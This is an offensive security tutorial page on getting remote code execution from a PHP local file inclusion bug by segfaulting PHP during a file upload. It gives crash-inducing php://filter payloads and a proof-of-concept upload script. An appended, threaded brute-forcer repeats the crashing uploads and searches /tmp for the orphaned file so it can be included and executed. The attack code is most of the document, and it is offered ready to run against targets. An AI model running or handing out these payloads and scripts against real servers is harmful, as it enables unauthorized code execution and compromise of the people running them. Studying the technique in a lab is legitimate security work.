LFI2RCE via Segmentation Fault


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

According to the writeups https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/ (second part) and https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view, the following payloads caused a segmentation fault in PHP:

php
// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");

// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");

You should know that if you send a POST request that includes a file upload, PHP creates a temporary file in /tmp/php<something> (the template is phpXXXXXX, with the six X's filled in by mkstemp() from letters and digits) holding the contents of that file. That file is deleted automatically as soon as the request has been processed.

If you have an LFI and manage to trigger a segmentation fault in PHP while the upload is being processed, the PHP worker dies before the cleanup runs and the temporary file is never deleted. You can then brute-force its name through the LFI until you include it and execute arbitrary code. Keep in mind that six random alphanumeric characters give 62^6 (about 5.7 * 10^10) possible names, so a naive one-request-per-name search is slow; every additional segfaulting upload leaves one more orphaned file behind, which proportionally shortens the expected search.

You can use the docker image https://hub.docker.com/r/easyengine/php7.0 for testing.

python
# upload file with segmentation fault
import requests

url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
files = {'file': open('la.php', 'rb')}   # la.php must print the marker searched for below
response = requests.post(url, files=files)


# Search for the file (improve this with threads)
import itertools
import requests
import string

# mkstemp() fills the six X's of PHP's "phpXXXXXX" template with letters and digits
charset = string.ascii_letters + string.digits

host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)


def bruteforce(charset):
    # walk every combination of the six random characters in /tmp/phpXXXXXX
    for chars in itertools.product(charset, repeat=6):
        filename = "".join(chars)
        url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
        print(url)
        response = requests.get(url)
        if b'spyd3r' in response.content:   # output of the included la.php
            print("[+] Include success!")
            return True
    return False


def main():
    bruteforce(charset)

if __name__ == "__main__":
    main()
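The script above invites you to "improve this with threads". The following is an added example, not code from the original writeups: it keeps the same attack flow (segfaulting multipart upload, then an LFI search for /tmp/phpXXXXXX) but streams the 62^6 keyspace lazily, probes it in parallel batches, stops at the first hit, and takes the HTTP fetcher as a parameter so the search logic can be exercised offline. The vulnerable parameter `i`, the `spyd3r` marker printed by la.php, the base URL and the batch/worker sizes are assumptions carried over from the page's PoC, not values from any real target.

```python
# Added example (not from the original writeups): batched, threaded
# brute-force of the orphaned /tmp/phpXXXXXX upload file behind an LFI.
import itertools
import string
from concurrent.futures import ThreadPoolExecutor

# mkstemp() fills the six "X"s of PHP's "phpXXXXXX" template from
# letters and digits, so this is the assumed candidate alphabet.
CHARSET = string.ascii_letters + string.digits
TEMPLATE_LEN = 6
MARKER = "spyd3r"   # assumed: the string the uploaded la.php prints when included


def keyspace_size(charset=CHARSET, length=TEMPLATE_LEN):
    """Number of names a full search would have to try (62**6 by default)."""
    return len(charset) ** length


def candidate_names(charset=CHARSET, length=TEMPLATE_LEN):
    """Lazily yield phpXXXXXX names without materialising the whole keyspace."""
    for chars in itertools.product(charset, repeat=length):
        yield "php" + "".join(chars)


def include_url(base_url, name, param="i"):
    """LFI URL that includes /tmp/<name>; 'i' is the assumed vulnerable parameter."""
    return "%s/index.php?%s=/tmp/%s" % (base_url, param, name)


def find_tmp_file(fetch, base_url, names, marker=MARKER, workers=16, batch=256):
    """Probe candidate names in parallel batches and return the first one whose
    include produces `marker`, or None once `names` is exhausted.

    fetch(url) -> response body as str.  Batching with islice keeps memory flat
    even for a 62**6 keyspace (ThreadPoolExecutor.map would otherwise submit
    every candidate up front) and lets the search stop early on a hit."""
    names = iter(names)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        while True:
            chunk = list(itertools.islice(names, batch))
            if not chunk:
                return None
            bodies = pool.map(lambda n: fetch(include_url(base_url, n)), chunk)
            for name, body in zip(chunk, bodies):
                if marker in body:
                    return name


def http_fetch(session):
    """Wrap a requests.Session into the fetch(url) callable used above."""
    def fetch(url):
        return session.get(url, timeout=10).text
    return fetch


def upload_with_segfault(session, base_url, payload_path, segv_filter, param="i"):
    """Send the multipart upload while the LFI parameter points at a
    segfaulting php://filter chain, so the temp file is never unlinked.
    The crashed worker usually drops the connection, so a transport error
    here is expected and is returned as None rather than raised."""
    import requests
    url = "%s/index.php?%s=%s" % (base_url, param, segv_filter)
    with open(payload_path, "rb") as f:
        try:
            return session.post(url, files={"file": f}, timeout=10)
        except requests.exceptions.RequestException:
            return None


if __name__ == "__main__":
    import requests
    base = "http://127.0.0.1:8008"          # assumed test target (see docker image above)
    segv = "php://filter/string.strip_tags/resource=/etc/passwd"   # PHP 7.0 payload from the page
    with requests.Session() as s:
        # Each segfaulting upload orphans one more file, so repeating this
        # step shrinks the expected number of probes proportionally.
        for _ in range(50):
            upload_with_segfault(s, base, "la.php", segv)
        print("keyspace size:", keyspace_size())
        print("hit:", find_tmp_file(http_fetch(s), base, candidate_names()))
```

`find_tmp_file` deliberately takes the fetcher as an argument: pass `http_fetch(session)` against a lab target, or a stub that returns the marker for a known name to check the search logic before pointing it at anything real. The `batch` and `workers` values trade memory and target load against throughput; tune them to what the target's PHP worker pool tolerates, since every probe that includes a non-existent file still costs a request.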
